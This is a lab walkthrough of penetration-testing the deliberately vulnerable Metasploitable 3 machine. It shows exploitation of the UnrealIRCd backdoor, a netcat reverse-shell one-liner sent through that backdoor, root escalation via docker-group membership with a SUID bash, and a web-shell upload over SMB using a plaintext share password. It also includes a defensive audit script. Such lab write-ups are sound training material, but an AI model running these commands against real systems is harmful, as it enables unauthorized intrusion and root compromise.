Metasploitable 3 Walkthrough: Penetration Testing (Part 2)


February 25, 2025

Introduction

In the previous part, we covered network discovery and began exploiting the FTP service and web applications running on port 80. In this part, we will continue by gaining remote code execution and exploring further vulnerabilities.

Starting from the Nmap scan results, in this section we will exploit the UnrealIRCd service and SMB.

Unreal IRC Service 6697

With Metasploit

While searching for a public exploit, we found that Metasploit already has a module for this service. The vulnerability dates from November 2009, when the UnrealIRCd source archive on the mirror (Unreal3.2.8.1.tar.gz) was replaced with a malicious version containing a backdoor that allows anyone to execute any command with the privileges of the user running the ircd. For more information, check the following Link.

Exploitation is straightforward: set RHOST, select the payload (cmd/unix/reverse_perl), set the target port to 6697 and LHOST to 10.0.2.15, and we obtain a command execution shell.

Now, we have a command execution shell.

According to the Metasploit module, the exploit connects to the service and sends `AB;`, the marker implemented in the backdoor that makes it pass everything following it to the system shell; the module therefore sends `AB;` followed by the payload to get the reverse shell.

Let's try it manually by running the command `AB; mkdir /tmp/pwn;`

As we can see, the directory has been successfully created.

To get a reverse shell, we can use the same trick with `AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP_ADDRESS PORT >/tmp/f`


Privilege Escalation

After getting the reverse shell, we now have a stable shell, and boba_fett is a member of the docker group, which means it can use Docker without being in the sudo group.

So, running `docker images` to list the installed images showed that Ubuntu was one of them, which makes the escalation a piece of cake.

`docker run -v /:/mnt --rm -it ubuntu chroot /mnt /bin/bash` mounts the host's / at /mnt inside the container and uses `chroot` to get full root access to the host filesystem, allowing us to write to the host's files.

As you can see in the picture, the host's files are mounted as the root directory of the container.

Set the SUID bit on /bin/bash with `chmod u+s /bin/bash` so that it can be run as root.

After running it with the -p option, which enables privileged mode and prevents bash from dropping the elevated privileges, we have the effective user ID (EUID) of root, as shown in the image below.
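A defensive counterpart to this escalation, added here as an example and not part of the original walkthrough: a small audit that flags the two conditions it relies on, non-root users in the docker group and a set-user-ID bit on a shell binary. The group file is a constructed sample, and the list of binaries to check is an assumption, so the script runs without touching the live system.

```shell
#!/bin/sh
# Added audit for the docker-group and SUID-shell escalation path.
# Takes a group(5)-format file and a list of binaries, so it can run against
# a constructed sample instead of the real /etc/group.

# Print the members of the docker group, one per line.
docker_group_members() {
    group_file="$1"
    # group(5) fields: name:password:gid:member_list
    awk -F: '$1 == "docker" { print $4 }' "$group_file" | tr ',' '\n' | sed '/^$/d'
}

# Return 0 if the given file carries the set-user-ID bit, 1 otherwise.
is_suid() {
    [ -u "$1" ]
}

# Print one line per finding; exit status 1 if anything was flagged.
audit() {
    group_file="$1"; shift
    findings=0
    for m in $(docker_group_members "$group_file"); do
        echo "FINDING: user '$m' is in the docker group (root-equivalent via 'docker run -v /:/mnt')"
        findings=$((findings + 1))
    done
    for b in "$@"; do
        if is_suid "$b"; then
            echo "FINDING: SUID bit set on $b"
            findings=$((findings + 1))
        fi
    done
    echo "findings: $findings"
    [ "$findings" -eq 0 ]
}

# Constructed sample group file mirroring the situation on this box.
SAMPLE_GROUP=$(mktemp)
printf 'root:x:0:\ndocker:x:999:boba_fett\nsudo:x:27:\n' > "$SAMPLE_GROUP"
audit "$SAMPLE_GROUP" /bin/bash /usr/bin/passwd || true
rm -f "$SAMPLE_GROUP"
```

On a real host, point `audit` at /etc/group and the output of `find / -perm -4000 -type f` to catch a SUID /bin/bash that should never be there.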

Samba 445

Under /uploads/

The chewbacca user has access to /var/www/html.

To get a reverse shell, we need to edit the IP and port fields of the web shell.

`smbclient //10.0.2.15/public -U chewbacca%rwaaaawr5` connects to the SMB share, and then we upload the web shell.

The web shell used is taken from the resources section.

Requesting the web shell with the curl command triggers the reverse shell.

Then, listening on the specified port (in my case, 1234), we have a reverse shell.

Resources:

